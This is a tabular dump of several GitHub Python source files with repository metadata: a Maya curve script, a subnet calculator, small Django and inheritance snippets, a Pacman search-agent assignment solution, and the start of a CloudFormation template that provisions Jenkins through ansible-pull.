blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b01fa01765514bf343f4f068110fbd7cab8fa532 | 41fe349f67b9aac7ed41e2ccaf941f279379baa2 | /TESTFOLDER/Test.py | 8b1192a7f7db8e68509b3822c197587245477327 | [] | no_license | Jap3dWorks/MayaPy | 3cec086e3029530d5d959bef8499143423c0218c | f7bcfb8e4a3a6c359532ec3d272b127fee9f68cb | refs/heads/master | 2020-03-23T03:51:52.082178 | 2019-01-01T22:27:07 | 2019-01-01T22:27:07 | 141,053,154 | 5 | 5 | null | null | null | null | UTF-8 | Python | false | false | 4,051 | py | import maya.api.OpenMaya as OpenMaya
import maya.cmds as cmds
def curveCreateEP():
mselList = OpenMaya.MGlobal.getActiveSelectionList()
mFndagObject = OpenMaya.MFnDagNode()
dependNode = mFndagObject.create('transform', 'curve')
# points
mPointArray = OpenMaya.MPointArray()
mPointArray.append(OpenMaya.MPoint(0,0,0))
mPointArray.append(OpenMaya.MPoint(10,0,0))
mPointArray.append(OpenMaya.MPoint(20,10,0))
mPointArray.append(OpenMaya.MPoint(20,20,0))
mPointArray.append(OpenMaya.MPoint(20,30,0))
mFnCurve = OpenMaya.MFnNurbsCurve()
mFnCurve.createWithEditPoints(mPointArray, 7, 1, False, False, False, dependNode)
# get area
area = mFnCurve.area(1.0)
print area
def curveCreateCV(cv=((0,0,0), (5,0,0), (10,0,0), (20,10,5), (20,15,10), (20,20,15)), knots=((0.0), (0.0), (0.0), (3), (7), (10), (10), (10))):
"""
Create a curve and snap an object to the center
Args:
cv: Curve vertex
knots: Knots
"""
mFndagObject = OpenMaya.MFnDagNode()
dependNode = mFndagObject.create('transform', 'curve')
# CV
mPointArray = OpenMaya.MPointArray(cv)
# knots
KnotArray = OpenMaya.MDoubleArray(knots)
# create curve
mFnCurve = OpenMaya.MFnNurbsCurve()
mFnCurve.create(mPointArray, KnotArray, 3, 1, False, False, dependNode)
mfntransformCurve = OpenMaya.MFnTransform(dependNode)
mfntransformCurve.setTranslation(OpenMaya.MVector(15, 15, 15), 2)
mfntransformCurve.setRotation(OpenMaya.MEulerRotation(OpenMaya.MVector(15, 15, 15)), 1)
# if mfn is not set with dag path, cant do world transforms
curveDagpath = mfntransformCurve.getPath()
mFnCurve.setObject(curveDagpath)
print ('dag path: %s' % curveDagpath)
# get area
area = mFnCurve.area(1.0)
print (area)
# get lenght
curveLenght = mFnCurve.length()
print (curveLenght)
middlePoint = mFnCurve.getPointAtParam(5.0, OpenMaya.MSpace.kWorld)
middleNormal = mFnCurve.normal(5.0, OpenMaya.MSpace.kWorld)
middleNormal.normalize()
middleTangent = mFnCurve.tangent(5.0, OpenMaya.MSpace.kWorld)
middleTangent.normalize()
middleBinormal = middleTangent ^ middleNormal
middleBinormal.normalize()
print(middleNormal, middleTangent, middleBinormal)
mselList = OpenMaya.MGlobal.getActiveSelectionList()
mDagPath = mselList.getDagPath(0)
transformation = OpenMaya.MMatrix(((middleTangent.x, middleTangent.y, middleTangent.z, 0.0),
(middleNormal.x, middleNormal.y, middleNormal.z, 0.0),
(middleBinormal.x, middleBinormal.y, middleBinormal.z, 0.0),
(middlePoint.x, middlePoint.y, middlePoint.z, 1)))
mfnTransform = OpenMaya.MFnTransform(mDagPath)
mfnTransform.setTransformation(OpenMaya.MTransformationMatrix(transformation))
"""
# rotate vector a over vector b
quaternion = OpenMaya.MQuaternion(OpenMaya.MVector(1,0,0), middleTangent)
mfnTransform = OpenMaya.MFnTransform(mDagPath)
mfnTransform.setRotation(quaternion, 1)
mfnTransform.setTranslation(OpenMaya.MVector(middlePoint), 4)
"""
def getdestination(element, attribute):
mselList = OpenMaya.MSelectionList()
mselList.add(element)
meshObj = mselList.getDependNode(0)
mfnShape = OpenMaya.MFnMesh(meshObj)
mplug = mfnShape.findPlug(attribute, True)
print mplug.name()
print mplug.numChildren()
print mplug.numConnectedChildren()
print mplug.isConnected
print mplug.numConnectedElements()
print mplug.isElement
print mplug.numElements()
for i in range(mplug.evaluateNumElements()):
mchild = mplug.elementByPhysicalIndex(i)
print mchild.name()
print mchild.numConnectedChildren()
print mchild.isConnected
print mchild.connectedTo(True, True)[0].name()
print mchild.isElement
# getdestination(element='polySurfaceShape3', attribute='instObjGroups') | [
"38395064+Jap3dWorks@users.noreply.github.com"
] | 38395064+Jap3dWorks@users.noreply.github.com |
b8e8df4165e5c68d730eab8b8fe69f808f78ca32 | bc08302533982d4a154f5615a2c8366f695234e5 | /work/tools/free_ip.py | 721bcc9f76e13c7c646d22000c17c96dd1e0352c | [] | no_license | rvfedorin/PythonDevelopment | bfd3cfb4ad22d72e2002d7430fa8821ea35717f6 | d6748189874b53b8357d5b3ff7d520ff0a93e15a | refs/heads/master | 2022-12-13T11:53:16.041737 | 2019-02-15T08:50:15 | 2019-02-15T08:50:15 | 122,050,190 | 0 | 0 | null | 2022-12-08T01:18:43 | 2018-02-19T10:57:37 | Python | UTF-8 | Python | false | false | 3,528 | py | def mark_used_ip(list_used_ip, list_all_ip):
for ip in list_all_ip:
if ip in list_used_ip:
position_ip = list_all_ip.index(ip)
list_all_ip[position_ip] = 'x'
def get_free_lan(list_ip_with_used):
free_lan = []
for lan in range(25, 33):
count_subnet = 2**(lan - 24)
count_ip_in_subnet = 2**(32 - lan)
start_ip = 0
end_ip = count_ip_in_subnet
for subnet in range(count_subnet):
if len(list_ip_with_used) >= end_ip and 'x' not in list_ip_with_used[start_ip:end_ip]:
free_lan.append(f'{list_ip_with_used[start_ip]}/{lan}')
all_ip_temp = [_ for _ in list_ip_with_used if _ not in list_ip_with_used[start_ip:end_ip]]
list_ip_with_used = all_ip_temp[:]
else:
start_ip += count_ip_in_subnet
end_ip += count_ip_in_subnet
if len(list_ip_with_used) == 0:
break
if len(list_ip_with_used) == 0:
break
return free_lan
def get_only_fourth_octet(list_ip):
list_octets = []
for i in list_ip:
octet = i.split('.')
list_octets.append(int(octet[3]))
lan = f'{octet[0]}.{octet[1]}.{octet[2]}.'
return list_octets, lan
def get_all_ip_in_lan(list_lan):
ip_of_all_lan = []
for lan in list_lan:
mask_lan = lan.split('/')
lan_ip = mask_lan[0].split('.')
for i in range(2**(32-int(mask_lan[1]))):
four_octet = int(lan_ip[3])+i
ip_of_all_lan.append(f'{lan_ip[0]}.{lan_ip[1]}.{lan_ip[2]}.{four_octet}')
return ip_of_all_lan
if __name__ == '__main__':
all_ip = []
for i in range(256):
all_ip.append(i)
x = (get_all_ip_in_lan(['172.30.86.164/30', '172.30.86.216/30', '172.30.86.152/30', '172.30.86.156/30',
'172.30.86.160/30', '172.30.86.144/30', '172.30.86.140/30', '172.30.86.136/30',
'172.30.86.120/30', '172.30.86.116/30', '172.30.86.88/30', '172.30.86.92/30',
'172.30.86.96/30', '172.30.86.80/30', '172.30.86.20/30', '172.30.86.184/30',
'172.30.86.196/30', '172.30.86.212/30', '172.30.86.220/30', '172.30.86.224/30',
'172.30.86.232/30', '172.30.86.236/30', '172.30.86.240/30', '172.30.86.248/30',
'172.30.86.252/30', '172.30.86.132/30', '172.30.86.44/30', '172.30.86.148/30',
'172.30.86.76/30', '172.30.86.48/30', '172.30.86.40/30', '172.30.86.84/30',
'172.30.86.36/30', '172.30.86.72/30', '172.30.86.104/30', '172.30.86.108/30',
'172.30.86.24/30', '172.30.86.228/30', '172.30.86.204/30', '172.30.86.0/30',
'172.30.86.4/30', '172.30.86.8/30', '172.30.86.12/30', '172.30.86.244/30',
'172.30.86.192/30', '172.30.86.124/30', '172.30.86.112/30', '172.30.86.60/30',
'172.30.86.208/30', '172.30.86.176/30', '172.30.86.68/30', '172.30.86.28/30',
'172.30.86.32/30', '172.30.86.56/30', '172.30.86.100/30', '172.30.86.168/29',
'172.30.86.200/30', '172.30.86.188/30', '172.30.86.180/30']))
list_used_ip = x
list_used_ip_octet, lan24 = get_only_fourth_octet(list_used_ip)
mark_used_ip(list_used_ip_octet, all_ip)
free = get_free_lan(all_ip)
for i in free:
print(f'{lan24}{i}')
| [
"35657347+rvfedorin@users.noreply.github.com"
] | 35657347+rvfedorin@users.noreply.github.com |
0ce7fa3ff54ced5a15f802f3250f417770921ea9 | d7242e07cc79aa7a5e32a376de7e5a9d5f294cf7 | /0x0A-python-inheritance/3-is_kind_of_class.py | 77732c7315bcdc022c31b2cff3f39467cbf04ddf | [] | no_license | Jfprado11/holbertonschool-higher_level_programming | 87d921290b43202cc8507d898444df9455138d0f | f277a5ecd4dd349d94d9a26542cf9eca23f92fad | refs/heads/main | 2023-07-28T20:30:24.632598 | 2021-09-22T21:32:32 | 2021-09-22T21:32:32 | 361,762,721 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 286 | py | #!/usr/bin/python3
"""
chekck if a object is a instance of
a class or if it is a intance inherited
"""
def is_kind_of_class(obj, a_class):
"""check if a intance come from a
specific object"""
if isinstance(obj, a_class):
return True
else:
return False
| [
"jfpc11@misena.edu.co"
] | jfpc11@misena.edu.co |
783c15f25e45e4baa9ecf7d04d81cc4d15b25356 | b9633d8a7c61e63cdb76af9b32273485e680682b | /projecto/ventas/urls.py | 6c6b9c0ce9e7c0fa960834db47eb38d6ad6a4a9d | [] | no_license | AbrWin/paginaWeb | e5fca38154d9785dce15b7a5741d25290c1bdcd1 | 3a6f1143b64ae39bce4706447086e645758716ce | refs/heads/master | 2016-09-05T09:20:25.870500 | 2014-05-08T04:22:44 | 2014-05-08T04:22:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 255 | py | from django.conf.urls.defaults import patterns, url
urlpatterns = patterns('ventas.views',
url(r'^add/producto/$','add_product_view', name='vista_addProducto'),
url(r'^edit/producto/(?P<id_prod>.*)/$','edit_product_view', name='vista_edit_producto'),
) | [
"tidusxt@hotmail.com"
] | tidusxt@hotmail.com |
e4c0e92a5c5ae4d52e039b64627acae0a2c3b266 | 92f7ba5345401f0e87ff1e34cac70854dec9c0ef | /search/searchAgents.py | 6886f12a2fbe99782f98f443f92067878c7a5898 | [] | no_license | xiaojunch/cs188 | 4c1c7e1804ae0b1a4c0fef6b4acb618164e029a0 | a6c37365e07c4edf4c968ffabd4aa45f2113bfb7 | refs/heads/master | 2021-01-23T10:57:46.844385 | 2017-07-02T16:49:51 | 2017-07-02T16:49:51 | 93,114,294 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 25,437 | py | # searchAgents.py
# ---------------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
"""
This file contains all of the agents that can be selected to control Pacman. To
select an agent, use the '-p' option when running pacman.py. Arguments can be
passed to your agent using '-a'. For example, to load a SearchAgent that uses
depth first search (dfs), run the following command:
> python pacman.py -p SearchAgent -a fn=depthFirstSearch
Commands to invoke other search strategies can be found in the project
description.
Please only change the parts of the file you are asked to. Look for the lines
that say
"*** YOUR CODE HERE ***"
The parts you fill in start about 3/4 of the way down. Follow the project
description for details.
Good luck and happy searching!
"""
from game import Directions
from game import Agent
from game import Actions
import util
import time
import search
def manDist(A,B):
return abs(A[0]-B[0]) + abs(A[1]-B[1])
class GoWestAgent(Agent):
"An agent that goes West until it can't."
def getAction(self, state):
"The agent receives a GameState (defined in pacman.py)."
if Directions.WEST in state.getLegalPacmanActions():
return Directions.WEST
else:
return Directions.STOP
#######################################################
# This portion is written for you, but will only work #
# after you fill in parts of search.py #
#######################################################
class SearchAgent(Agent):
"""
This very general search agent finds a path using a supplied search
algorithm for a supplied search problem, then returns actions to follow that
path.
As a default, this agent runs DFS on a PositionSearchProblem to find
location (1,1)
Options for fn include:
depthFirstSearch or dfs
breadthFirstSearch or bfs
Note: You should NOT change any code in SearchAgent
"""
def __init__(self, fn='depthFirstSearch', prob='PositionSearchProblem', heuristic='nullHeuristic'):
# Warning: some advanced Python magic is employed below to find the right functions and problems
# Get the search function from the name and heuristic
if fn not in dir(search):
raise AttributeError, fn + ' is not a search function in search.py.'
func = getattr(search, fn)
if 'heuristic' not in func.func_code.co_varnames:
print('[SearchAgent] using function ' + fn)
self.searchFunction = func
else:
if heuristic in globals().keys():
heur = globals()[heuristic]
elif heuristic in dir(search):
heur = getattr(search, heuristic)
else:
raise AttributeError, heuristic + ' is not a function in searchAgents.py or search.py.'
print('[SearchAgent] using function %s and heuristic %s' % (fn, heuristic))
# Note: this bit of Python trickery combines the search algorithm and the heuristic
self.searchFunction = lambda x: func(x, heuristic=heur)
# Get the search problem type from the name
if prob not in globals().keys() or not prob.endswith('Problem'):
raise AttributeError, prob + ' is not a search problem type in SearchAgents.py.'
self.searchType = globals()[prob]
print('[SearchAgent] using problem type ' + prob)
def registerInitialState(self, state):
"""
This is the first time that the agent sees the layout of the game
board. Here, we choose a path to the goal. In this phase, the agent
should compute the path to the goal and store it in a local variable.
All of the work is done in this method!
state: a GameState object (pacman.py)
"""
if self.searchFunction == None: raise Exception, "No search function provided for SearchAgent"
starttime = time.time()
problem = self.searchType(state) # Makes a new search problem
self.actions = self.searchFunction(problem) # Find a path
totalCost = problem.getCostOfActions(self.actions)
print('Path found with total cost of %d in %.1f seconds' % (totalCost, time.time() - starttime))
if '_expanded' in dir(problem): print('Search nodes expanded: %d' % problem._expanded)
def getAction(self, state):
"""
Returns the next action in the path chosen earlier (in
registerInitialState). Return Directions.STOP if there is no further
action to take.
state: a GameState object (pacman.py)
"""
if 'actionIndex' not in dir(self): self.actionIndex = 0
i = self.actionIndex
self.actionIndex += 1
if i < len(self.actions):
return self.actions[i]
else:
return Directions.STOP
class PositionSearchProblem(search.SearchProblem):
"""
A search problem defines the state space, start state, goal test, successor
function and cost function. This search problem can be used to find paths
to a particular point on the pacman board.
The state space consists of (x,y) positions in a pacman game.
Note: this search problem is fully specified; you should NOT change it.
"""
def __init__(self, gameState, costFn = lambda x: 1, goal=(1,1), start=None, warn=True, visualize=True):
"""
Stores the start and goal.
gameState: A GameState object (pacman.py)
costFn: A function from a search state (tuple) to a non-negative number
goal: A position in the gameState
"""
self.walls = gameState.getWalls()
self.startState = gameState.getPacmanPosition()
if start != None: self.startState = start
self.goal = goal
self.costFn = costFn
self.visualize = visualize
if warn and (gameState.getNumFood() != 1 or not gameState.hasFood(*goal)):
print 'Warning: this does not look like a regular search maze'
# For display purposes
self._visited, self._visitedlist, self._expanded = {}, [], 0 # DO NOT CHANGE
def getStartState(self):
return self.startState
def isGoalState(self, state):
isGoal = state == self.goal
# For display purposes only
if isGoal and self.visualize:
self._visitedlist.append(state)
import __main__
if '_display' in dir(__main__):
if 'drawExpandedCells' in dir(__main__._display): #@UndefinedVariable
__main__._display.drawExpandedCells(self._visitedlist) #@UndefinedVariable
return isGoal
def getSuccessors(self, state):
"""
Returns successor states, the actions they require, and a cost of 1.
As noted in search.py:
For a given state, this should return a list of triples,
(successor, action, stepCost), where 'successor' is a
successor to the current state, 'action' is the action
required to get there, and 'stepCost' is the incremental
cost of expanding to that successor
"""
successors = []
for action in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:
x,y = state
dx, dy = Actions.directionToVector(action)
nextx, nexty = int(x + dx), int(y + dy)
if not self.walls[nextx][nexty]:
nextState = (nextx, nexty)
cost = self.costFn(nextState)
successors.append( ( nextState, action, cost) )
# Bookkeeping for display purposes
self._expanded += 1 # DO NOT CHANGE
if state not in self._visited:
self._visited[state] = True
self._visitedlist.append(state)
return successors
def getCostOfActions(self, actions):
"""
Returns the cost of a particular sequence of actions. If those actions
include an illegal move, return 999999.
"""
if actions == None: return 999999
x,y= self.getStartState()
cost = 0
for action in actions:
# Check figure out the next state and see whether its' legal
dx, dy = Actions.directionToVector(action)
x, y = int(x + dx), int(y + dy)
if self.walls[x][y]: return 999999
cost += self.costFn((x,y))
return cost
class StayEastSearchAgent(SearchAgent):
"""
An agent for position search with a cost function that penalizes being in
positions on the West side of the board.
The cost function for stepping into a position (x,y) is 1/2^x.
"""
def __init__(self):
self.searchFunction = search.uniformCostSearch
costFn = lambda pos: .5 ** pos[0]
self.searchType = lambda state: PositionSearchProblem(state, costFn, (1, 1), None, False)
class StayWestSearchAgent(SearchAgent):
"""
An agent for position search with a cost function that penalizes being in
positions on the East side of the board.
The cost function for stepping into a position (x,y) is 2^x.
"""
def __init__(self):
self.searchFunction = search.uniformCostSearch
costFn = lambda pos: 2 ** pos[0]
self.searchType = lambda state: PositionSearchProblem(state, costFn)
def manhattanHeuristic(position, problem, info={}):
"The Manhattan distance heuristic for a PositionSearchProblem"
xy1 = position
xy2 = problem.goal
return abs(xy1[0] - xy2[0]) + abs(xy1[1] - xy2[1])
def euclideanHeuristic(position, problem, info={}):
"The Euclidean distance heuristic for a PositionSearchProblem"
xy1 = position
xy2 = problem.goal
return ( (xy1[0] - xy2[0]) ** 2 + (xy1[1] - xy2[1]) ** 2 ) ** 0.5
#####################################################
# This portion is incomplete. Time to write code! #
#####################################################
class CornersProblem(search.SearchProblem):
"""
This search problem finds paths through all four corners of a layout.
You must select a suitable state space and successor function
"""
def __init__(self, startingGameState):
"""
Stores the walls, pacman's starting position and corners.
"""
self.walls = startingGameState.getWalls()
self.startingPosition = startingGameState.getPacmanPosition()
top, right = self.walls.height-2, self.walls.width-2
self.corners = ((1,1), (1,top), (right, 1), (right, top))
for corner in self.corners:
if not startingGameState.hasFood(*corner):
print 'Warning: no food in corner ' + str(corner)
self._expanded = 0 # DO NOT CHANGE; Number of search nodes expanded
# Please add any code here which you would like to use
# in initializing the problem
"*** YOUR CODE HERE ***"
def getStartState(self):
"""
Returns the start state (in your state space, not the full Pacman state
space)
"""
state = []
state.append(self.startingPosition)
cornerState = {}
for corner in self.corners:
cornerState[corner] = 0
state.append(cornerState)
return state
def isGoalState(self, state):
"""
Returns whether this search state is a goal state of the problem.
"""
for corner in state[1]:
if state[1][corner] == 0:
return 0
return 1
def getSuccessors(self, state):
"""
Returns successor states, the actions they require, and a cost of 1.
As noted in search.py:
For a given state, this should return a list of triples, (successor,
action, stepCost), where 'successor' is a successor to the current
state, 'action' is the action required to get there, and 'stepCost'
is the incremental cost of expanding to that successor
"""
successors = []
for action in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:
# Add a successor state to the successor list if the action is legal
# Here's a code snippet for figuring out whether a new position hits a wall:
# x,y = currentPosition
# dx, dy = Actions.directionToVector(action)
# nextx, nexty = int(x + dx), int(y + dy)
# hitsWall = self.walls[nextx][nexty]
x,y = state[0]
dx, dy = Actions.directionToVector(action)
nextx, nexty = int(x+dx), int(y+dy)
if not self.walls[nextx][nexty]:
nextPosi = (nextx, nexty)
nextCornerState = state[1].copy()
if nextPosi in nextCornerState:
nextCornerState[nextPosi] = 1
nextState = [nextPosi,nextCornerState]
cost = 1
successors.append( (nextState, action, cost) )
self._expanded += 1 # DO NOT CHANGE
return successors
def getCostOfActions(self, actions):
"""
Returns the cost of a particular sequence of actions. If those actions
include an illegal move, return 999999. This is implemented for you.
"""
if actions == None: return 999999
x,y= self.startingPosition
for action in actions:
dx, dy = Actions.directionToVector(action)
x, y = int(x + dx), int(y + dy)
if self.walls[x][y]: return 999999
return len(actions)
def cornersHeuristic(state, problem):
corners = problem.corners # These are the corner coordinates
walls = problem.walls # These are the walls of the maze, as a Grid (game.py)
"*** YOUR CODE HERE ***"
currPosit = state[0]
visitCorners = []
for corner in state[1]:
if state[1][corner] == 0:
visitCorners.append(corner)
if len(visitCorners) == 0:
return 0
else:
pacToCorner = []
for corner in visitCorners:
pacToCorner.append(manDist(corner,currPosit))
if len(pacToCorner) == 1:
return pacToCorner[0]
else:
return max(pacToCorner)
class AStarCornersAgent(SearchAgent):
"A SearchAgent for FoodSearchProblem using A* and your foodHeuristic"
def __init__(self):
self.searchFunction = lambda prob: search.aStarSearch(prob, cornersHeuristic)
self.searchType = CornersProblem
class FoodSearchProblem:
"""
A search problem associated with finding the a path that collects all of the
food (dots) in a Pacman game.
A search state in this problem is a tuple ( pacmanPosition, foodGrid ) where
pacmanPosition: a tuple (x,y) of integers specifying Pacman's position
foodGrid: a Grid (see game.py) of either True or False, specifying remaining food
"""
def __init__(self, startingGameState):
self.start = (startingGameState.getPacmanPosition(), startingGameState.getFood())
self.walls = startingGameState.getWalls()
self.startingGameState = startingGameState
self._expanded = 0 # DO NOT CHANGE
self.heuristicInfo = {} # A dictionary for the heuristic to store information
def getStartState(self):
return self.start
def isGoalState(self, state):
return state[1].count() == 0
def getSuccessors(self, state):
"Returns successor states, the actions they require, and a cost of 1."
successors = []
self._expanded += 1 # DO NOT CHANGE
for direction in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:
x,y = state[0]
dx, dy = Actions.directionToVector(direction)
nextx, nexty = int(x + dx), int(y + dy)
if not self.walls[nextx][nexty]:
nextFood = state[1].copy()
nextFood[nextx][nexty] = False
successors.append( ( ((nextx, nexty), nextFood), direction, 1) )
return successors
def getCostOfActions(self, actions):
"""Returns the cost of a particular sequence of actions. If those actions
include an illegal move, return 999999"""
x,y= self.getStartState()[0]
cost = 0
for action in actions:
# figure out the next state and see whether it's legal
dx, dy = Actions.directionToVector(action)
x, y = int(x + dx), int(y + dy)
if self.walls[x][y]:
return 999999
cost += 1
return cost
class AStarFoodSearchAgent(SearchAgent):
"A SearchAgent for FoodSearchProblem using A* and your foodHeuristic"
def __init__(self):
self.searchFunction = lambda prob: search.aStarSearch(prob, foodHeuristic)
self.searchType = FoodSearchProblem
def foodHeuristic(state, problem):
"""
Your heuristic for the FoodSearchProblem goes here.
This heuristic must be consistent to ensure correctness. First, try to come
up with an admissible heuristic; almost all admissible heuristics will be
consistent as well.
If using A* ever finds a solution that is worse uniform cost search finds,
your heuristic is *not* consistent, and probably not admissible! On the
other hand, inadmissible or inconsistent heuristics may find optimal
solutions, so be careful.
The state is a tuple ( pacmanPosition, foodGrid ) where foodGrid is a Grid
(see game.py) of either True or False. You can call foodGrid.asList() to get
a list of food coordinates instead.
If you want access to info like walls, capsules, etc., you can query the
problem. For example, problem.walls gives you a Grid of where the walls
are.
If you want to *store* information to be reused in other calls to the
heuristic, there is a dictionary called problem.heuristicInfo that you can
use. For example, if you only want to count the walls once and store that
value, try: problem.heuristicInfo['wallCount'] = problem.walls.count()
Subsequent calls to this heuristic can access
problem.heuristicInfo['wallCount']
"""
position, foodGrid = state
foodPosits = foodGrid.asList()
if not foodPosits:
return 0
elif len(foodPosits) == 1:
return manDist(position, foodPosits[0])
elif len(foodPosits) > 1:
side1 = max([foodPosit[0] for foodPosit in foodPosits]) - min([foodPosit[0] for foodPosit in foodPosits])
side2 = max([foodPosit[1] for foodPosit in foodPosits]) - min([foodPosit[1] for foodPosit in foodPosits])
pacToFood1 = min(abs(position[0]-max([foodPosit[0] for foodPosit in foodPosits])),abs(position[0]-min([foodPosit[0] for foodPosit in foodPosits])))
pacToFood2 = min(abs(position[1]-max([foodPosit[1] for foodPosit in foodPosits])),abs(position[1]-min([foodPosit[1] for foodPosit in foodPosits])))
return pacToFood1 + pacToFood2 + side1 + side2
def MinSpanTree(vertList):
'''
implements the Min Spanning Tree algo
'''
import util
import heapq
# initialize the problem
if len(vertList) < 2:
return 0
Visit = [vertList[0]]
NoVisit = util.PriorityQueue()
for vert in vertList[1:]:
dist = manDist(vert,Visit[0])
NoVisit.push(vert,dist)
# loop till NoVisit is empty
minDist = 0
while not NoVisit.isEmpty():
popEdge, _, popVert = heapq.heappop(NoVisit.heap)
minDist = minDist + popEdge
for _,_,vert in NoVisit.heap:
dist = manDist(vert,popVert)
NoVisit.update(vert,dist)
return minDist
class ClosestDotSearchAgent(SearchAgent):
"Search for all food using a sequence of searches"
def registerInitialState(self, state):
self.actions = []
currentState = state
while(currentState.getFood().count() > 0):
nextPathSegment = self.findPathToClosestDot(currentState) # The missing piece
self.actions += nextPathSegment
for action in nextPathSegment:
legal = currentState.getLegalActions()
if action not in legal:
t = (str(action), str(currentState))
raise Exception, 'findPathToClosestDot returned an illegal move: %s!\n%s' % t
currentState = currentState.generateSuccessor(0, action)
self.actionIndex = 0
print 'Path found with cost %d.' % len(self.actions)
def findPathToClosestDot(self, gameState):
"""
Returns a path (a list of actions) to the closest dot, starting from
gameState.
"""
# Here are some useful elements of the startState
startPosition = gameState.getPacmanPosition()
food = gameState.getFood()
walls = gameState.getWalls()
problem = AnyFoodSearchProblem(gameState)
"*** YOUR CODE HERE ***"
import util
stateQueue = util.PriorityQueue()
actionQueue = util.PriorityQueue()
costQueue = util.PriorityQueue()
stateSet = []
stateSet.append(startPosition)
stateQueue.push(startPosition,0)
actionQueue.push([],0)
costQueue.push(0,0)
while not stateQueue.isEmpty():
popState = stateQueue.pop()
if problem.isGoalState(popState):
return actionQueue.pop()
else:
routeHistory = actionQueue.pop()
costHistory = costQueue.pop()
successorStates = problem.getSuccessors(popState)
if successorStates:
for (state,action,cost) in successorStates:
if state not in stateSet:
currentRoute = routeHistory[:]
currentRoute.append(action)
currentCost = costHistory + cost
heur = nearestFoodHeur(state,problem)
currentCostHeur = currentCost + heur
stateQueue.push(state,currentCostHeur)
actionQueue.push(currentRoute,currentCostHeur)
costQueue.push(currentCost,currentCostHeur)
stateSet.append(state)
print "Unable to find a route"
def nearestFoodHeur(state,problem):
''' Find the nearest manhattan distance between the state and foods'''
foods = problem.food.asList()
if len(foods) == 0:
return 0
elif len(foods) == 1:
return manDist(state,foods[0])
else:
pacToFood = []
for food in foods:
pacToFood.append(manDist(state,food))
return min(pacToFood)
class AnyFoodSearchProblem(PositionSearchProblem):
"""
A search problem for finding a path to any food.
This search problem is just like the PositionSearchProblem, but has a
different goal test, which you need to fill in below. The state space and
successor function do not need to be changed.
The class definition above, AnyFoodSearchProblem(PositionSearchProblem),
inherits the methods of the PositionSearchProblem.
You can use this search problem to help you fill in the findPathToClosestDot
method.
"""
def __init__(self, gameState):
"Stores information from the gameState. You don't need to change this."
# Store the food for later reference
self.food = gameState.getFood()
# Store info for the PositionSearchProblem (no need to change this)
self.walls = gameState.getWalls()
self.startState = gameState.getPacmanPosition()
self.costFn = lambda x: 1
self._visited, self._visitedlist, self._expanded = {}, [], 0 # DO NOT CHANGE
def isGoalState(self, state):
"""
The state is Pacman's position. Fill this in with a goal test that will
complete the problem definition.
"""
x,y = state
"*** YOUR CODE HERE ***"
if (x,y) in self.food.asList():
return 1
else:
return 0
def mazeDistance(point1, point2, gameState):
"""
Returns the maze distance between any two points, using the search functions
you have already built. The gameState can be any game state -- Pacman's
position in that state is ignored.
Example usage: mazeDistance( (2,4), (5,6), gameState)
This might be a useful helper function for your ApproximateSearchAgent.
"""
x1, y1 = point1
x2, y2 = point2
walls = gameState.getWalls()
assert not walls[x1][y1], 'point1 is a wall: ' + str(point1)
assert not walls[x2][y2], 'point2 is a wall: ' + str(point2)
prob = PositionSearchProblem(gameState, start=point1, goal=point2, warn=False, visualize=False)
return len(search.bfs(prob))
| [
"xiaojunch@gmail.com"
] | xiaojunch@gmail.com |
175e2835830e918abdf633ac13e097ad4dffcd2c | 6e5ddc38d08a060dee8ce705290f180ba0ea43d9 | /jenkins-cf-template.py | e3bf14acc62e3e30bc7da0e31048f4d88980b7a9 | [] | no_license | escher100/effectiveDevOps | 91d91748d27714b4b32e3a09980b70a471e86c9b | c4f93d19cf4bce650b8c3e1d1bd270b5004c8a91 | refs/heads/master | 2021-01-21T13:29:34.031503 | 2017-10-10T16:48:25 | 2017-10-10T16:48:25 | 102,128,517 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,292 | py | """Generating CloudFormation template."""
from ipaddress import ip_network
from ipify import get_ip
from troposphere import (
Base64,
ec2,
GetAtt,
Join,
Output,
Parameter,
Ref,
Template,
)
ApplicationName = "jenkins"
ApplicationPort = "8080"
# Setup Github repo to install ansible, gut and
# install app and files
GithubAccount='escher100'
GithubAnsibleURL='https://github.com/{}/ansible'.format(GithubAccount)
AnsiblePullCmd = \
"/usr/local/bin/ansible-pull -U {} {}.yaml -i localhost".format(
GithubAnsibleURL,
ApplicationName
)
ud = Base64(Join('\n', [
"#!/bin/bash",
"touch /home/ec2-user/userdata.touch"
]))
ud = Base64(Join('\n', [
"#!/bin/bash",
"yum install -y git",
"pip install ansible",
AnsiblePullCmd,
"echo '*/10 * * * * ec2-user {}' > /etc/cron.d/ansible-pull".format(AnsiblePullCmd)
]))
PublicCidrIp = str(ip_network(get_ip()))
t = Template()
t.add_description("Effective DevOps in AWS: HelloWorld web application")
t.add_parameter(Parameter(
"KeyPair",
Description="Name of an existing EC2 KeyPair to SSH",
Type="AWS::EC2::KeyPair::KeyName",
